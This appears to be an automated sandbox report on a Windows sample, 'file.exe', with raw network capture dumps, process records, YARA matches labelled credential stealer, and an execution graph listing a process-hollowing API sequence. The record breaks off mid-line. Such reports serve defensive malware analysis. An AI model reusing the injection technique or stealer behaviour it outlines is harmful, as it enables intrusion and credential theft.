                                                                      2024-10-30 21:23:08 UTC15331OUTData Raw: af d7 fa f7 3b 60 80 ca 7c 6d 6f c1 52 bd 02 63 a4 9c a5 34 38 12 96 52 0e 20 80 d8 09 62 ec a1 14 09 a0 34 01 65 35 c2 99 27 5c 19 ae c2 a0 5d 15 0b f3 71 b0 6c 5b 74 78 a6 d8 fa 3e 8e c7 0e f0 d8 77 de 16 0d c2 2b 3a ba bb b1 7d a6 fc 56 ff ff 83 e8 d4 03 80 56 dc 01 e6 f8 40 82 29 25 9f 05 98 7d 7c 30 3f 55 e9 52 66 44 64 99 e5 62 6f 66 39 3f c4 fd 87 68 fc d8 9c c1 25 1a d9 77 da 40 8c 43 32 88 b7 70 48 cd 74 f2 e0 03 cd 8a ab 81 a6 e8 b8 1d cf 9c ca 20 05 35 98 b2 83 57 a2 49 f5 df fa 90 1e 91 f8 09 c1 ad dd 32 34 67 0e 14 3b 52 93 fc 7c 79 52 8d 3b a5 95 44 a9 b6 90 27 0f c1 72 bd 25 c0 c6 8d 3b 5d 52 8a 29 3a 87 99 37 c9 d8 6e 0e 70 55 64 35 38 8b 72 08 6b 8a b5 bd e6 a6 e3 eb 8e 4a 14 12 23 0b 49 74 56 35 67 72 57 80 ff 1e aa 36 3a 48 00 4c 7f 47
                                                                      Data Ascii: ;`|moRc48R b4e5'\]ql[tx>w+:}VV@)%}|0?URfDdbof9?h%w@C2pHt 5WI24g;R|yR;D'r%;]R):7npUd58rkJ#ItV5grW6:HLG
                                                                      2024-10-30 21:23:08 UTC15331OUTData Raw: c0 58 9d ff 12 9a dc 3b 05 8a 09 29 77 99 64 51 9b 89 ed 98 1e 97 c6 f0 80 53 19 11 0f 44 f5 86 6b 5d 23 79 4a 18 58 6d 93 3a 6d a9 26 e2 a8 ca ff 36 a9 c6 ea 8b e5 b3 10 da 36 34 2f 36 b5 e6 e6 0b 4d ff 3e 12 a8 8e 04 55 46 8d ae 1f 71 19 74 35 36 13 c9 4d 65 84 5f 9a 27 2f b9 58 c0 41 a7 c9 78 9f c4 45 6b 95 ea c4 9d 8c 50 a2 e9 33 8b b8 23 68 02 8a 9d 56 bc f2 55 61 bd 4e d2 5d 85 61 38 a9 d4 18 3c 8d 6a 2c af 40 3c 6f 72 be 89 97 c0 1e b5 e2 c4 1a fd 1d 04 16 ed b3 19 c1 8b 2f bf 1c 2b fd ed 5e 58 67 79 f6 0a 8f 96 f9 67 4e 36 43 83 0f 23 c9 39 93 c0 db 93 d6 de ae 88 d0 39 bf 85 fe fe b0 99 b9 b3 b1 59 f3 ef b5 90 f0 6e 5a ae 7b 39 19 45 68 7b 5a fb 7d b3 55 16 f9 9f 3a 6f 11 2c 42 bf 6d 34 ff 29 8a aa ff e3 62 47 87 4a 63 e8 5e d6 58 c6 a5 75 e2 78
                                                                      Data Ascii: X;)wdQSDk]#yJXm:m&664/6M>UFqt56Me_'/XAxEkP3#hVUaN]a8<j,@<or/+^XgygN6C#99YnZ{9Eh{Z}U:o,Bm4)bGJc^Xux
                                                                      2024-10-30 21:23:08 UTC15331OUTData Raw: 22 0d 26 ee 9a 86 67 a7 a6 bc c4 ce 0c 8e 97 0e ea cb c7 84 3b da 1c aa d0 bb 86 29 07 da 35 ed 87 23 25 d6 9d a6 bc 18 5a b0 42 f5 26 63 14 c5 73 13 3d 42 96 04 cb 4e ea a8 06 5d 2f 20 74 41 c4 2d ba 6e e9 a9 4a ea 77 b7 21 96 cd 54 fe 62 ca df fa 0c a9 36 dd 37 f2 60 f0 d2 48 21 f9 fc b2 60 b1 21 63 f8 5b d9 41 42 6d fb 9d ef c3 48 87 fc 15 50 1f 76 d5 e3 d7 90 c2 a7 e1 cc 6a a0 1d ae 9e bd 0b 4d 6b b5 2e 99 e7 6c 3a 7d 94 a4 01 1c db 55 52 e2 31 e9 f1 a8 dc 51 7c e3 b7 ba 9a f7 8e 1c a7 47 9d c7 9a 4a 1f 08 15 86 8c f8 66 4a 5c 89 a5 da d2 e1 b7 2e 8d 97 2b 90 7d 8e 9a 8e ea a4 ba 77 7c a3 d0 ae 0a 7b 24 7f 99 f7 ea 68 d9 64 fc 20 b9 d9 46 8d 72 aa 9d de 60 d2 0f 89 f8 50 b4 d8 c6 43 1b 0b 02 8c d1 f7 0c 9e 35 df 40 e7 ad d2 d0 8a 73 4b a9 e2 ef 9a 70
                                                                      Data Ascii: "&g;)5#%ZB&cs=BN]/ tA-nJw!Tb67`H!`!c[ABmHPvjMk.l:}UR1Q|GJfJ\.+}w|{$hd Fr`PC5@sKp
                                                                      2024-10-30 21:23:08 UTC15331OUTData Raw: b5 54 ea 6e b0 95 a2 b0 e9 51 32 a8 c9 b0 5f f1 f2 64 be ed 3b c3 24 e3 f1 76 9c e8 54 bc 6a d4 8e 3e f1 41 ed f5 76 19 a2 3d d7 e4 28 85 7d dc d6 93 da d7 12 38 49 f3 f9 72 0c ef bb b2 ab 4b 05 04 1d 51 4e eb 78 d2 60 56 8e f2 51 46 43 58 05 f2 20 ac 70 05 40 4b d8 43 2c 51 f0 83 b7 ed 87 70 0b 31 d8 0d bb 2e cd 41 d6 58 88 a0 47 22 83 a0 eb ee 2a 8d 7c 90 05 b0 57 a1 1c fa fd b6 94 e5 38 e5 e1 59 c5 07 b3 28 65 97 61 76 1e b4 b2 57 88 b9 cb 13 98 62 af 8d 60 99 73 fd 77 77 ef f5 ec cc 15 af bc ba 1b 93 ee 56 c7 1c cf 11 9d 72 4e 88 17 0b 76 c0 cb c8 f6 7d 4b 82 8f 6f c6 ee 68 96 5c 74 d2 23 48 60 2e c4 3a f6 ad 32 02 fd 75 ba e6 6d 2a ac 1c b2 3b 41 b3 e2 e8 f7 1f c2 09 3a 90 ae a9 cb bf 40 7b 03 b5 71 a7 67 fc 5b 93 ad 20 0a 9c 93 b0 bc 27 01 aa 48 75
                                                                      Data Ascii: TnQ2_d;$vTj>Av=(}8IrKQNx`VQFCX p@KC,Qp1.AXG"*|W8Y(eavWb`swwVrNv}Koh\t#H`.:2um*;A:@{qg[ 'Hu
                                                                      2024-10-30 21:23:08 UTC15331OUTData Raw: 6a 19 1d 41 b8 42 49 2c 02 01 b8 fc 10 00 fd 1b e1 ee 61 d7 51 fe bd 13 cc e6 89 ca b2 a7 09 28 f4 eb 8d a7 88 cf e0 00 cf 08 d0 64 30 cb 60 f6 d0 dc 63 87 c8 30 1b 88 f6 bc 3c 81 25 fa 13 6e 82 c5 88 47 7b 8f 02 96 bb 4d e8 88 20 08 d4 5b bf 2f e3 29 5f ac 43 80 04 e0 5d b0 05 c2 7a 31 c4 dc 91 62 69 e1 56 7a ce 83 f0 a7 eb 7e 61 83 82 be 87 97 6d e7 2b 7b 76 b9 49 fc cd 7a e2 75 76 ac 15 dd 6a 86 bf ff de b2 0f 78 47 f1 4f e4 a8 15 3a 89 00 37 25 bb 41 b0 41 8e 0a 90 13 67 9f 55 64 7c 11 ff 02 79 47 69 14 94 49 41 d3 9d 4b b2 b1 8c 9e 12 9c 6c ee 19 c4 f0 98 28 b5 6f 7f f7 4e 30 39 a2 84 63 9c 96 90 f8 53 9a fc 4e 94 7a 82 48 5c fe 29 d5 2d 02 84 a5 a3 6f 7d 85 e4 ae 17 b8 11 d0 06 7f 67 d4 51 d4 4e 2c 6a 24 02 0e 86 2f 05 4e 1f c9 e0 7b 12 66 8f 91 3c
                                                                      Data Ascii: jABI,aQ(d0`c0<%nG{M [/)_C]z1biVz~am+{vIzuvjxGO:7%AAgUd|yGiIAKl(oN09cSNzH\)-o}gQN,j$/N{f<
                                                                      2024-10-30 21:23:08 UTC15331OUTData Raw: e9 ca 73 41 06 9b f3 3e a7 fc 1a 55 44 40 78 3f 73 ed 25 21 ba e7 6c a2 94 eb dc 5b a7 7d ed e1 c5 3b ad e9 ab 37 db 0e 61 2e 3b 22 5d dc e5 44 cc 8b 95 d7 25 f8 38 46 ed 2d bc 6d aa 59 e7 f3 b3 8d 2f 56 96 ae 15 57 dd 77 d1 89 ac ba ba af 6a b5 db f1 fb 6e 12 8b e6 34 0e 0b de 87 6a 9e 04 bc d6 79 fe d6 87 d5 43 65 3a 4a 95 da 7d 69 a1 fc b8 bb 45 96 a2 fa 1f d2 e7 41 ff 7e 77 4b 66 d8 cf 57 d6 91 ab 4e cf 3b 87 73 24 22 57 5f dc f6 12 84 09 ad 3b 33 27 4f 7f 71 30 ed ff 5e 3a 9a 6a 2f f9 c9 ec fb c1 8c ec e1 38 e6 ec 95 48 53 46 8c ec c6 57 a1 96 e3 0b d1 0d 45 6b 0d 6f d7 1b d6 ef 4d 9c 70 7a 27 1c f2 d4 06 e6 5b ee 8e 41 45 a9 6a 48 56 33 71 1b 57 e3 0a f1 12 cf 40 4a a8 23 b4 b0 a7 e0 da c6 29 bf d1 27 55 39 be c1 7e 0e 0a b1 56 47 aa b7 ec c2 83 34
                                                                      Data Ascii: sA>UD@x?s%!l[};7a.;"]D%8F-mY/VWwjn4jyCe:J}iEA~wKfWN;s$"W_;3'Oq0^:j/8HSFWEkoMpz'[AEjHV3qW@J#)'U9~VG4
                                                                      2024-10-30 21:23:08 UTC15331OUTData Raw: 2e 00 bb 7a 09 57 d0 88 20 0f cb 2d 34 d7 84 d1 15 5e 6a 38 ba c6 54 1d 74 f4 6c 54 17 7c f6 59 9e 70 84 23 86 3e 9f 2d d2 78 07 8e 95 35 59 1b ad ee 50 95 27 63 3b f8 21 27 0e 34 35 96 ee e2 0c ac da 2c a7 0b 03 89 21 d8 6f 07 a5 bd 38 bf b0 e9 09 b8 e4 6d d8 da 00 53 f3 28 ae 88 6e 53 40 93 65 25 08 62 cb d3 fa 82 f9 ce 4d e5 c6 e2 6b 11 f3 73 3c e6 8c 88 e4 2d 1c 30 13 33 cb ec ae a1 8a 3f aa 3b 37 e7 e1 d9 80 35 c5 8d 2b 42 79 1a e8 f1 98 14 be d9 8a 23 8a f2 17 5c 22 36 ce 29 13 05 7e 0c 9c c6 b6 d5 5b 7b c1 8e dc bd 91 64 6d 93 2f 3f ae 28 68 2c 3e f7 84 92 6f 11 26 01 06 ad b4 3e 38 06 aa f1 b5 87 61 ac 86 1d 14 c8 c1 cc 81 fe b2 58 e3 14 ee 39 66 c6 55 f6 5d 53 42 0a 26 28 86 ce 04 84 f7 64 2f 7c ba a9 5a 47 28 bc 3c 82 0b f1 59 fd ca bb 75 db 4e
                                                                      Data Ascii: .zW -4^j8TtlT|Yp#>-x5YP'c;!'45,!o8mS(nS@e%bMks<-03?;75+By#\"6)~[{dm/?(h,>o&>8aX9fU]SB&(d/|ZG(<YuN
                                                                      2024-10-30 21:23:08 UTC15331OUTData Raw: 38 10 9a 8d 18 4f fc 1b ca e3 f9 c0 c7 94 8e 70 ac e9 52 2e e4 1a 43 ad 12 a5 ee 12 2c aa e3 61 dc f2 c9 26 7c 0c 5f 3e 8e ea be 3e 7d d7 74 38 31 08 c9 d3 68 ce ba 79 4d a6 25 aa 30 21 08 71 92 31 e6 c9 2c 3a 9b d0 16 40 da f8 95 97 d6 a5 b9 8b d0 f8 db b2 f4 d3 50 d4 a2 da 6b 8e 18 67 df 52 9c 5c fa 3c 0d 11 9f 35 62 99 e7 e5 91 37 6a 5e 83 c2 e1 16 3c 7b 95 1a f3 3a b8 dd 92 44 02 21 84 03 c1 ce 4b 12 33 51 99 6f 99 3d 50 d1 8b 06 75 c4 a9 fe 8c d3 02 0b fb c4 d5 c5 63 7e 22 71 83 b2 f2 43 51 ab fd 07 3c df 61 4d 15 88 4a ae 91 f1 91 ef f8 86 2b 40 fa 92 6d 9a a4 50 4b d1 cb f6 2d 1e c0 0e e6 1b 74 8a 4d 86 b7 36 89 52 c9 33 6b 67 40 db 21 6c 2d 97 64 fc 6a 6c c4 63 71 2d 7a 31 15 a4 9f c4 d3 8c d1 4b 36 82 a6 87 f9 8e ef 45 2f b5 26 69 2a 2b f5 a1 01
                                                                      Data Ascii: 8OpR.C,a&|_>>}t81hyM%0!q1,:@PkgR\<5b7j^<{:D!K3Qo=Puc~"qCQ<aMJ+@mPK-tM6R3kg@!l-djlcq-z1K6E/&i*+
                                                                      2024-10-30 21:23:08 UTC15331OUTData Raw: c5 47 21 87 c2 7e 1e 32 9e ff e9 af 19 0b df 3b 4c 60 18 00 ba 9f 2a c3 09 49 16 82 bc 0c 3f 6f 77 89 09 3f 51 e3 cd b8 86 81 a5 ff 06 57 9f c4 a0 b1 75 f7 bb 18 8e 7a c1 42 c0 65 5f ac 16 ea 2d a1 b4 2b 5e 92 68 84 d8 b2 39 f3 3a f7 72 4e 2b a4 89 a4 be 52 8c d6 f0 21 2c 6b f0 37 1b 90 16 34 57 47 28 12 18 1a 20 b6 77 96 54 0d 19 8a e1 bb b7 ff bb 6f 7d b9 69 65 76 1b 4f 0d 8c 9a d0 1f 1a ac e0 d8 db e9 f4 93 80 b8 3f 76 e1 ca 30 7e 63 89 6f ad 82 01 3f 25 c5 12 bc 01 02 f5 ef 9e 33 a0 73 17 7e 7f f8 4f 39 d9 c7 75 ab 9a 64 04 d9 08 59 3e 8a fc dd 4f 92 8e 75 22 16 00 e2 6e e1 11 77 d1 25 3c 4f c9 70 99 8b db f0 b7 d2 74 52 88 39 01 c9 36 5c 0c 0d 7d 22 fc 1f 19 c5 da 1b 73 59 c2 2a 75 d8 ce 44 3d 36 c2 08 eb c0 4f d8 7e e6 bf 11 a7 18 6f 4b 3b 4c 02 66
                                                                      Data Ascii: G!~2;L`*I?ow?QWuzBe_-+^h9:rN+R!,k74WG( wTo}ievO?v0~co?%3s~O9udY>Ou"nw%<OptR96\}"sY*uD=6O~oK;Lf
                                                                      2024-10-30 21:23:10 UTC1019INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 21:23:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=bem8f5eso5ssa4nj5erql908v6; expires=Sun, 23-Feb-2025 15:09:49 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUYFmCVEK4eBA%2BNtdMWaxYED6MLVVwcgzcbmGEBLEiuMOALK2jeX%2FbNCURtPLU8wCbSQLJApZNyLJidRblOrP57vHskf681iGJwE9OaJT%2BM6THKu8HedUxV9iF%2BRRJXDC9k%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8dae76fb49894750-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1260&sent=212&recv=607&lost=0&retrans=0&sent_bytes=2837&recv_bytes=571071&delivery_rate=2366013&cwnd=244&unsent_bytes=0&cid=27f2cfad11f15a9d&ts=1842&x=0"


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:17:22:53
                                                                      Start date:30/10/2024
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                      Imagebase:0xba0000
                                                                      File size:665'088 bytes
                                                                      MD5 hash:998C59D4BF9C18E798A6DB77F7CE10F9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:17:22:53
                                                                      Start date:30/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:17:22:57
                                                                      Start date:30/10/2024
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                      Imagebase:0xba0000
                                                                      File size:665'088 bytes
                                                                      MD5 hash:998C59D4BF9C18E798A6DB77F7CE10F9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2118733198.0000000001379000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2118075950.0000000001379000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2130598412.0000000001379000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2147992648.0000000001379000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2149945390.000000000137B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:17:22:57
                                                                      Start date:30/10/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 152
                                                                      Imagebase:0x70000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:9.6%
                                                                        Dynamic/Decrypted Code Coverage:0.7%
                                                                        Signature Coverage:15.4%
                                                                        Total number of Nodes:1131
                                                                        Total number of Limit Nodes:7
                                                                        execution_graph 21888 bee1b4 21893 bee1ea 21888->21893 21889 bee337 GetPEB 21890 bee349 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 21889->21890 21891 bee3f0 WriteProcessMemory 21890->21891 21890->21893 21892 bee435 21891->21892 21894 bee43a WriteProcessMemory 21892->21894 21895 bee477 WriteProcessMemory Wow64SetThreadContext ResumeThread 21892->21895 21893->21889 21893->21890 21894->21892 23337 bc1aae 30 API calls 23412 bbfdae 45 API calls 2 library calls 23413 bc4fab 15 API calls 3 library calls 23338 ba88a0 29 API calls ___std_exception_copy 23414 baffa0 107 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 23416 bca59f 7 API calls __wsopen_s 23342 bbe695 92 API calls std::ios_base::_Init 23343 bd2e8f 52 API calls 2 library calls 23419 bcf985 16 API calls __dosmaperr 23344 bd1086 34 API calls 2 library calls 23346 bbee84 16 API calls 2 library calls 23347 bc20fe 52 API calls 2 library calls 23422 bc19fb 81 API calls 2 library calls 23423 bc1bfb 21 API calls _unexpected 23348 bdaef5 59 API calls 23425 ba89f0 5 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 23351 bbbef4 14 API calls ___std_exception_destroy 23352 bd10ef 15 API calls 23430 bd4fe4 51 API calls 3 library calls 23358 bc24e0 49 API calls 5 library calls 23434 bc15dc 41 API calls 23361 baa2df 44 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 23436 bb0dd0 104 API calls 2 library calls 23437 bc43d1 20 API calls 23438 bbefd4 9 API calls 3 library calls 23363 bc00cc 75 API calls 23364 bc50cb GetCommandLineA GetCommandLineW 23366 bd4ec4 52 API calls 3 library calls 23367 ba6494 31 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 23368 bac2c0 30 API calls 4 library calls 21896 bc1ac0 21897 bc1acc ___scrt_is_nonwritable_in_current_image 21896->21897 21922 bbea63 21897->21922 21899 bc1ad3 21900 bc1c2c 21899->21900 21910 bc1afd ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 21899->21910 21958 bc0d3e 4 API calls 2 library calls 21900->21958 21902 bc1c33 21959 bc7a5d 21 API calls _unexpected 21902->21959 21904 bc1c39 21960 bc7a73 21 API calls _unexpected 21904->21960 21906 bc1c41 21907 bc1b1c 21908 bc1b9d 21933 bca006 21908->21933 21910->21907 21910->21908 21954 bc7aa7 48 API calls 4 library calls 21910->21954 21912 bc1ba3 21937 ba76f0 21912->21937 21916 bc1bc4 21916->21902 21917 bc1bc8 21916->21917 21918 bc1bd1 21917->21918 21956 bc7a89 21 API calls _unexpected 21917->21956 21957 bbea9c 79 API calls ___scrt_uninitialize_crt 21918->21957 21921 bc1bda 21921->21907 21923 bbea6c 21922->21923 21961 bc0eaf IsProcessorFeaturePresent 21923->21961 21925 bbea78 21962 bc245c 10 API calls 2 library calls 21925->21962 21927 bbea7d 21928 bbea81 21927->21928 21963 bc4e9e 21927->21963 21928->21899 21931 bbea98 21931->21899 21934 bca00f 21933->21934 21935 bca014 21933->21935 21976 bca12f 21934->21976 21935->21912 21941 ba7733 _Yarn _strlen 21937->21941 21939 ba7850 22213 bcb036 21939->22213 21941->21939 22252 ba7e00 30 API calls 5 library calls 21941->22252 21944 ba793f 22253 ba7c00 29 API calls 3 library calls 21944->22253 21947 ba7bb6 21949 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21947->21949 21948 bca9ce 78 API calls 21951 ba78c6 _Yarn 21948->21951 21950 ba7bc5 21949->21950 21955 bc0ceb GetModuleHandleW 21950->21955 21951->21944 21951->21948 21952 bcb036 101 API calls 21951->21952 22216 bc9ca4 21951->22216 22220 bcb6fd 21951->22220 22224 ba6390 GetPEB 21951->22224 22249 bcb3b7 21951->22249 21952->21951 21954->21908 21955->21916 21956->21918 21957->21921 21958->21902 21959->21904 21960->21906 21961->21925 21962->21927 21967 bd1a5d 21963->21967 21966 bc247b 7 API calls 2 library calls 21966->21928 21968 bd1a6d 21967->21968 21969 bbea8a 21967->21969 21968->21969 21971 bd11d1 21968->21971 21969->21931 21969->21966 21972 bd11d8 21971->21972 21973 bd121b GetStdHandle 21972->21973 21974 bd127d 21972->21974 21975 bd122e GetFileType 21972->21975 21973->21972 21974->21968 21975->21972 21977 bca138 21976->21977 21980 bca14e 21976->21980 21977->21980 21982 bca070 21977->21982 21979 bca145 21979->21980 21999 bca23d 57 API calls 3 library calls 21979->21999 21980->21935 21983 bca07c 21982->21983 21984 bca079 21982->21984 22000 bd1294 21983->22000 21984->21979 21989 bca08d 22027 bcf73f 21989->22027 21990 bca099 22033 bca15b 29 API calls 4 library calls 21990->22033 21993 bca0a0 21995 bcf73f ___free_lconv_mon 14 API calls 21993->21995 21996 bca0bd 21995->21996 21997 bcf73f ___free_lconv_mon 14 API calls 21996->21997 21998 bca0c3 21997->21998 21998->21979 21999->21980 22001 bd129d 22000->22001 22005 bca082 22000->22005 22034 bcfa86 22001->22034 22006 bd6208 GetEnvironmentStringsW 22005->22006 22007 bd6220 22006->22007 22020 bca087 22006->22020 22210 bcf889 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 22007->22210 22009 bd623d 22010 bd6247 FreeEnvironmentStringsW 22009->22010 22011 bd6252 22009->22011 22010->22020 22012 bcf779 __fread_nolock 15 API calls 22011->22012 22013 bd6259 22012->22013 22014 bd6261 22013->22014 22015 bd6272 22013->22015 22016 bcf73f ___free_lconv_mon 14 API calls 22014->22016 22211 bcf889 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 22015->22211 22018 bd6266 FreeEnvironmentStringsW 22016->22018 22018->22020 22019 bd6282 22021 bd6289 22019->22021 22022 bd6291 22019->22022 22020->21989 22020->21990 22024 bcf73f ___free_lconv_mon 14 API calls 22021->22024 22023 bcf73f ___free_lconv_mon 14 API calls 22022->22023 22025 bd628f FreeEnvironmentStringsW 22023->22025 22024->22025 22025->22020 22028 bcf74a HeapFree 22027->22028 22029 bca093 22027->22029 22028->22029 22030 bcf75f GetLastError 22028->22030 22029->21979 22031 bcf76c __dosmaperr 22030->22031 22212 bc9bf4 14 API calls __dosmaperr 22031->22212 22033->21993 22035 bcfa91 22034->22035 22041 bcfa97 22034->22041 22084 bd03e3 6 API calls std::_Locinfo::_Locinfo_ctor 22035->22084 22038 bcfab1 22039 bcfab5 22038->22039 22040 bcfa9d 22038->22040 22086 bd0a4f 14 API calls 3 library calls 22039->22086 22044 bcfaa2 22040->22044 22091 bca97f 48 API calls _unexpected 22040->22091 22041->22040 22085 bd0422 6 API calls std::_Locinfo::_Locinfo_ctor 22041->22085 22062 bd1655 22044->22062 22045 bcfac1 22047 bcfade 22045->22047 22048 bcfac9 22045->22048 22046 bcfb1b 22088 bd0422 6 API calls std::_Locinfo::_Locinfo_ctor 22047->22088 22087 bd0422 6 API calls std::_Locinfo::_Locinfo_ctor 22048->22087 22051 bcfad5 22056 bcf73f ___free_lconv_mon 14 API calls 22051->22056 22052 bcfaea 22053 bcfafd 22052->22053 22054 bcfaee 22052->22054 22090 bcfcdc 14 API calls _unexpected 22053->22090 22089 bd0422 6 API calls std::_Locinfo::_Locinfo_ctor 22054->22089 22059 bcfadb 22056->22059 22058 bcfb08 22060 bcf73f ___free_lconv_mon 14 API calls 22058->22060 22059->22040 22061 bcfb0f 22060->22061 22061->22044 22063 bd167f 22062->22063 22092 bd14e1 22063->22092 22068 bd16bf 22106 bd12dc 22068->22106 22069 bd16b1 22070 bcf73f ___free_lconv_mon 14 API calls 22069->22070 22072 bd1698 22070->22072 22072->22005 22074 bd16f7 22117 bc9bf4 14 API calls __dosmaperr 22074->22117 22076 bd16fc 22078 bcf73f ___free_lconv_mon 14 API calls 22076->22078 22077 bd173e 22080 bd1787 22077->22080 22118 bd1a10 29 API calls 2 library calls 22077->22118 22078->22072 22079 bd1712 22079->22077 22082 bcf73f ___free_lconv_mon 14 API calls 22079->22082 22081 bcf73f ___free_lconv_mon 14 API calls 22080->22081 22081->22072 22082->22077 22084->22041 22085->22038 22086->22045 22087->22051 22088->22052 22089->22051 22090->22058 22091->22046 22119 bc4619 22092->22119 22095 bd1514 22097 bd152b 22095->22097 22098 bd1519 GetACP 22095->22098 22096 bd1502 GetOEMCP 22096->22097 22097->22072 22099 bcf779 22097->22099 22098->22097 22100 bcf7b7 22099->22100 22104 bcf787 _unexpected 22099->22104 22131 bc9bf4 14 API calls __dosmaperr 22100->22131 22102 bcf7a2 RtlAllocateHeap 22103 bcf7b5 22102->22103 22102->22104 22103->22068 22103->22069 22104->22100 22104->22102 22130 bc7d8f EnterCriticalSection LeaveCriticalSection codecvt 22104->22130 22107 bd14e1 50 API calls 22106->22107 22108 bd12fc 22107->22108 22109 bd1401 22108->22109 22111 bd1339 IsValidCodePage 22108->22111 22115 bd1354 __fread_nolock 22108->22115 22110 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22109->22110 22113 bd14df 22110->22113 22111->22109 22112 bd134b 22111->22112 22114 bd1374 GetCPInfo 22112->22114 22112->22115 22113->22074 22113->22079 22114->22109 22114->22115 22132 bd186b 22115->22132 22117->22076 22118->22080 22120 bc4630 22119->22120 22121 bc4637 22119->22121 22120->22095 22120->22096 22121->22120 22127 bcf9cb 48 API calls 3 library calls 22121->22127 22123 bc4658 22128 bcffae 48 API calls __Getctype 22123->22128 22125 bc466e 22129 bcffdb 48 API calls __strnicoll 22125->22129 22127->22123 22128->22125 22129->22120 22130->22104 22131->22103 22133 bd1893 GetCPInfo 22132->22133 22135 bd195c 22132->22135 22134 bd18ab 22133->22134 22133->22135 22143 bd0d3b 22134->22143 22137 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22135->22137 22139 bd1a0e 22137->22139 22139->22109 22142 bd0e3c 53 API calls 22142->22135 22144 bc4619 __strnicoll 48 API calls 22143->22144 22145 bd0d5b 22144->22145 22163 bcf7c7 22145->22163 22147 bd0e0f 22166 bc13ad 14 API calls ___std_exception_destroy 22147->22166 22148 bd0d88 22148->22147 22151 bcf779 __fread_nolock 15 API calls 22148->22151 22153 bd0e17 22148->22153 22154 bd0dad __fread_nolock __alloca_probe_16 22148->22154 22149 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22152 bd0e3a 22149->22152 22151->22154 22158 bd0e3c 22152->22158 22153->22149 22154->22147 22155 bcf7c7 __strnicoll MultiByteToWideChar 22154->22155 22156 bd0df6 22155->22156 22156->22147 22157 bd0dfd GetStringTypeW 22156->22157 22157->22147 22159 bc4619 __strnicoll 48 API calls 22158->22159 22160 bd0e4f 22159->22160 22169 bd0e85 22160->22169 22167 bcf7f1 22163->22167 22166->22153 22168 